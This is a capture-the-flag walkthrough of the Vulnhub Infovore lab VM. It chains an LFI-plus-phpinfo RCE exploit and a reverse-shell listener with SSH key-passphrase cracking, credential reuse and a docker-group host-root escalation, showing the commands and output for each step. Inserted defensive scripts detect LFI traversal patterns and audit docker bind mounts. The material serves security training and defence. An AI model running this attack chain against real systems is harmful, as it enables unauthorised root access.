[VLN] Infovore

Today we are going to hack the Vulnhub machine called Infovore. You can download it from the following link: Infovore

Enumeration


We start with an nmap scan to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 192.168.1.27
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-28 22:24 CEST
Nmap scan report for infovore.home (192.168.1.27)
Host is up (0.00039s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Include me ...

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.00 seconds

We see that only port 80 is open, so we dig into it a bit more.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.27 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.27
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,php,html
[+] Timeout:        10s
===============================================================
2020/06/28 22:28:06 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/css (Status: 301)
/img (Status: 301)
/index.php (Status: 200)
/index.html (Status: 200)
/info.php (Status: 200)
/server-status (Status: 403)
/vendor (Status: 301)
===============================================================
2020/06/28 22:28:29 Finished
===============================================================

Among other things, we find the file info.php, which shows the typical phpinfo() output, and also index.php. Let's see whether index.php accepts any parameter...

sml@Cassandra:~/tools/parameth$ python parameth.py -u http://192.168.1.27/index.php
                                       |   |
  __ \   _` |  __| _` | __ `__ \   _ \ __| __ \
  |   | (   | |   (   | |   |   |  __/ |   | | |
  .__/ \__,_|_|  \__,_|_|  _|  _|\___|\__|_| |_|
  _|
parameth v1.337 - find parameters and craic rocks
Author: Ciaran McNally - https://securit.ie/
================================================
Establishing base figures...
POST data: 
Offset value: 0
GET: content-length-> 4743  status-> 200
POST: content-length-> 4743  status-> 200
Scanning it like you own it...
GET(size): filename | 4743 ->80 ( http://192.168.1.27/index.php?filename=discobiscuits )

We see that it accepts the parameter "filename". After some testing, there is little we can do with the LFI on its own; however, there is an exploit[1] that can help us, since we meet all of its requirements (an LFI plus an exposed phpinfo() page)! :)

sml@Cassandra:~/$ mkdir infovore
sml@Cassandra:~/$ cd infovore
sml@Cassandra:~/infovore$ wget https://github.com/M4LV0/LFI-phpinfo-RCE/blob/master/exploit.py

In the exploit we must change the IP and the port, and edit the REQ1 and LFIREQ variables so that they point to our info.php and our filename parameter:

REQ1="""POST /info.php?a=""".....
LFIREQ="""GET /index.php?filename=%s...
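As an added example (not part of the original write-up or of the exploit repository), here is how a defender could spot this chain in the Apache access log: the LFI shows up as an include parameter carrying traversal or a /tmp/php... temp-file path, and the phpinfo() race shows up as a burst of POSTs to the phpinfo page from a single client. The log lines are constructed, and the parameter names and the burst threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log format. The sample lines below are constructed for this
# example; they are not taken from the original write-up.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Query parameters that feed an include() on this app. Assumption: "filename"
# is the one found above; the others are common names worth watching.
INCLUDE_PARAMS = {"filename", "file", "page", "include"}

# Include values that never occur in legitimate traffic: traversal, sensitive
# files, PHP's upload temp-file prefix and stream wrappers used for LFI-to-RCE.
SUSPICIOUS_INCLUDE = re.compile(
    r"(\.\./|/etc/passwd|/proc/self|/tmp/php|php://|data:|expect://)", re.IGNORECASE
)

_POST = ('192.168.1.148 - - [28/Jun/2020:23:58:02 +0200] "POST /info.php?a=AAAA HTTP/1.1" '
         '200 71302 "-" "python-requests/2.23"')

SAMPLE_LINES = [
    '192.168.1.148 - - [28/Jun/2020:23:58:01 +0200] "GET /index.php?filename=../../../../etc/passwd HTTP/1.1" 200 4801 "-" "Mozilla/5.0"',
] + [_POST] * 25 + [
    '192.168.1.148 - - [28/Jun/2020:23:58:03 +0200] "GET /index.php?filename=/tmp/phpA1b2C3 HTTP/1.1" 200 4802 "-" "python-requests/2.23"',
    '192.168.1.50 - - [28/Jun/2020:23:59:10 +0200] "GET /index.php?filename=about HTTP/1.1" 200 4743 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [28/Jun/2020:23:59:11 +0200] "GET /index.html HTTP/1.1" 200 4674 "-" "Mozilla/5.0"',
    'not a log line',
]


def parse_line(line):
    """Split one access-log line into fields; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["path"])
    rec["script"] = parts.path
    # parse_qs decodes once; a second unquote catches double-encoded traversal.
    rec["query"] = {k: [unquote(v) for v in vals]
                    for k, vals in parse_qs(parts.query, keep_blank_values=True).items()}
    return rec


def find_lfi_attempts(lines):
    """Return (ip, script, param, value) for requests whose include parameter looks hostile."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for param in sorted(INCLUDE_PARAMS.intersection(rec["query"])):
            for value in rec["query"][param]:
                if SUSPICIOUS_INCLUDE.search(value):
                    hits.append((rec["ip"], rec["script"], param, value))
    return hits


def find_phpinfo_upload_bursts(lines, threshold=20):
    """The phpinfo()+LFI race fires many multipart POSTs at the phpinfo page;
    report the clients that exceed the threshold."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["script"].endswith("info.php"):
            counts[rec["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LINES):
        print("LFI attempt:", hit)
    for ip, n in find_phpinfo_upload_bursts(SAMPLE_LINES).items():
        print(f"phpinfo upload burst: {ip} sent {n} POSTs")
```

Both checks are cheap enough to run over a whole day's log; the obvious mitigation on the application side is to never pass user input to include() and to remove phpinfo() pages from anything reachable from the network.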

We start an nc listener.

sml@Cassandra:~$ nc -nlvp 3333
listening on [any] 3333 ...

And we run the exploit.

sml@Cassandra:~/tools$ python exploit.py 192.168.1.27 80 20

Low Shell



sml@Cassandra:~$ nc -nlvp 3333
listening on [any] 3333 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.27] 35313
Linux e71b67461f6c 3.16.0-6-amd64 #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) x86_64 GNU/Linux
 00:05:36 up  1:42,  0 users,  load average: 1.47, 4.48, 2.44
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash -i
www-data@e71b67461f6c:/var/www/html$ 

Now that we are in, we explore the system a bit more.

www-data@e71b67461f6c:/tmp$ cat /proc/1/cgroup
---SNIP---
8:perf_event:/docker/e71b67461f6c0078a9d7d25a70c0c303b81f0fa20a9a5fab4e51c098d575c0a7
7:blkio:/docker/e71b67461f6c0078a9d7d25a70c0c303b81f0fa20a9a5fab4e51c098d575c0a7
6:net_cls,net_prio:/docker/e71b67461f6c0078a9d7d25a70c0c303b81f0fa20a9a5fab4e51c098d575c0a7
5:freezer:/docker/e71b67461f6c0078a9d7d25a70c0c303b81f0fa20a9a5fab4e51c098d575c0a7
4:devices:/docker/e71b67461f6c0078a9d7d25a70c0c303b81f0fa20a9a5fab4e51c098d575c0a7
---SNIP---

We see that we are inside a container :(

.user.txt



www-data@e71b67461f6c:/var/www/html$ ls -la
total 312
drwxrwxrwx 6 www-data www-data   4096 Jun 22 22:39 .
drwxr-xr-x 5 root     root       4096 Jun 22 22:39 ..
-r--r--r-- 1 root     root         42 Jun 22 21:40 .user.txt
drwxr-xr-x 2 root     root       4096 Apr 27 10:55 css
-rw-r--r-- 1 root     root       2544 Sep 16  2019 gulpfile.js
drwxr-xr-x 2 root     root       4096 Apr 27 10:55 img
-rw-r--r-- 1 root     root       4674 Sep 16  2019 index.html
-rw-r--r-- 1 root     root        416 Jun  1 12:18 index.php
-rw-r--r-- 1 root     root         19 Apr 26 14:23 info.php
-rw-r--r-- 1 root     root     262191 Sep 16  2019 package-lock.json
-rw-r--r-- 1 root     root       1319 Sep 16  2019 package.json
drwxr-xr-x 2 root     root       4096 Apr 27 10:55 scss
drwxr-xr-x 4 root     root       4096 Sep 16  2019 vendor
www-data@e71b67461f6c:/var/www/html$ cat .user.txt
FLAG{Now_You_See_phpinfo_not_so_harmless}

We have found a flag; we keep digging through the system... In / we find a file called .oldkeys.tgz. We extract it.

www-data@e71b67461f6c:/$ cp .oldkeys.tgz /tmp
www-data@e71b67461f6c:/$ cd /tmp
www-data@e71b67461f6c:/tmp$ tar -xzvf .oldkeys.tgz
root
root.pub

We see that it contains a public key and a private key. We copy the private key to our machine to see whether we can crack its passphrase.

sml@Cassandra:~/.ssh$ /usr/share/john/ssh2john.py root > root.hash
sml@Cassandra:~/.ssh$ sudo /usr/sbin/john root.hash --wordlist=/home/sml/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
choclate93       (root)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:04 DONE (2020-06-29 09:45) 0.2457g/s 3523Kp/s 3523Kc/s 3523KC/s a6_123..*7¡Vamos!
Session completed

Good, we have the passphrase: choclate93. We run "su" to see whether the same password works for root.

www-data@e71b67461f6c:/$ su -P root
Password: choclate93
root@e71b67461f6c:/# id
uid=0(root) gid=0(root) groups=0(root)

It works :)

root.txt



root@e71b67461f6c:/tmp# cd /root
root@e71b67461f6c:~# ls
root.txt
root@e71b67461f6c:~# cat root.txt
FLAG{Congrats_on_owning_phpinfo_hope_you_enjoyed_it}
And onwards and upwards!

In root's home directory we see the .ssh folder, which contains 2 keys. The public key shows the user "admin" and an IP address.

root@e71b67461f6c:~/.ssh# ls 
id_rsa
id_rsa.pub
known_hosts
root@e71b67461f6c:~/.ssh# cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDN/keLDJowDdeSdHZz26wS1M2o2/eiJ99+acchRJr0lZE0YmqbfoIo+n75VS+eLiT03yonunkVp+lhK+uey7/Tu8JsQSHK1F0gci5FG7MKRU4/+m+0CODwVFTNgw3E4FKg5qu+nt6BkBThU3Vnhe/Ujbp5ruNjb4pPajll2Pv5dyRfaRrn0DTnhpBdeXWdIhU9QQgtxzmUXed/77rV6m4AL4+iENigp3YcPOjF7zUG/NEop9c1wdGpjSEhv/ftjyKoazFEmOI1SGpD3k9VZlIUFs/uw6kRVDJlg9uxT4Pz0tIEMVizlV4oZgcEyOJ9NkSe6ePUAHG7F+v7VjbYdbVh admin@192.168.150.1

We log in as admin on that IP.

root@e71b67461f6c:/# ssh admin@192.168.150.1
Enter passphrase for key '/root/.ssh/id_rsa': choclate93

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 23 05:59:43 2020 from 192.168.150.21
admin@infovore:~$

admin.txt



admin@infovore:~$ ls
admin.txt
admin@infovore:~$ cat admin.txt
FLAG{Escaped_from_D0ck3r}

We see that the admin user belongs to the docker group. Let's check which images are available.

admin@infovore:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
theart42/infovore   latest              40de379c5116        6 days ago          428MB

Now all that is left is to mount the system root / into the container directory /mnt/fuckfs; since we will be root inside the container, we will be able to read everything :)
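As an added example (not part of the original write-up), here is a small host audit covering the two container findings above: the /proc/1/cgroup check that told us we were inside a container, and the docker-group membership plus host-root bind mount that turn a low-privilege user into root on the host. The cgroup text, /etc/group contents and `docker inspect` JSON are constructed inputs; the function names are my own.

```python
import json

# Constructed sample inputs for this example (not taken from the original
# write-up): a container's /proc/1/cgroup, a host /etc/group, and the JSON
# that `docker inspect` prints for one container.
SAMPLE_CGROUP = """\
8:perf_event:/docker/0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
7:blkio:/docker/0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
1:name=systemd:/docker/0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
"""

SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:admin
docker:x:999:admin
www-data:x:33:
"""

SAMPLE_INSPECT = json.dumps([{
    "Id": "81abcd5978ad0000000000000000000000000000000000000000000000000000",
    "Name": "/constructed-example",
    "Mounts": [
        {"Type": "bind", "Source": "/", "Destination": "/mnt/fuckfs", "RW": True},
    ],
    "HostConfig": {"Privileged": False},
}])


def in_docker_container(cgroup_text):
    """True when PID 1's cgroup path sits under /docker/, the sign seen in the shell above."""
    return any("/docker/" in line.split(":", 2)[-1] for line in cgroup_text.splitlines())


def docker_group_members(group_text):
    """Members of the docker group in /etc/group; each of them is root-equivalent on the host."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and fields[0] == "docker":
            return [m for m in fields[3].split(",") if m]
    return []


def host_root_mounts(inspect_json):
    """(short id, destination) for every bind mount that exposes the host's / inside a container."""
    found = []
    for container in json.loads(inspect_json):
        for mount in container.get("Mounts", []):
            if mount.get("Type") == "bind" and mount.get("Source") == "/":
                found.append((container["Id"][:12], mount.get("Destination")))
    return found


def audit(group_text, cgroup_text=None, inspect_json=None):
    """Collect human-readable findings from the three checks; empty list means nothing found."""
    findings = []
    for user in docker_group_members(group_text):
        findings.append(f"user '{user}' is in the docker group and can become root on the host "
                        "by bind-mounting / into a container")
    if cgroup_text is not None and in_docker_container(cgroup_text):
        findings.append("this shell runs inside a Docker container; host checks must run on the host")
    if inspect_json is not None:
        for cid, dest in host_root_mounts(inspect_json):
            findings.append(f"container {cid} has the host root bind-mounted at {dest}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_GROUP, SAMPLE_CGROUP, SAMPLE_INSPECT):
        print("[!]", finding)
```

On a real host you would feed `audit()` the contents of /etc/group, /proc/1/cgroup and the output of `docker inspect $(docker ps -q)`. The fix for the admin finding is simply not to put unprivileged users in the docker group (or to use rootless Docker), since membership is equivalent to unrestricted root.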

root.txt



admin@infovore:~$ docker run -v /:/mnt/fuckfs -ti 40de379c5116 /bin/bash
root@81abcd5978ad:/var/www/html# cd /mnt/fuckfs/root
root@81abcd5978ad:/mnt/fuckfs/root# ls
root.txt
root@81abcd5978ad:/mnt/fuckfs/root# cat root.txt
[ASCII-art banner reading "Congrats! You pwned infovore!"]

FLAG{And_now_You_are_done}

@theart42 and @4nqr34z

End


And with that we are root on the machine :)

[1] https://github.com/M4LV0/LFI-phpinfo-RCE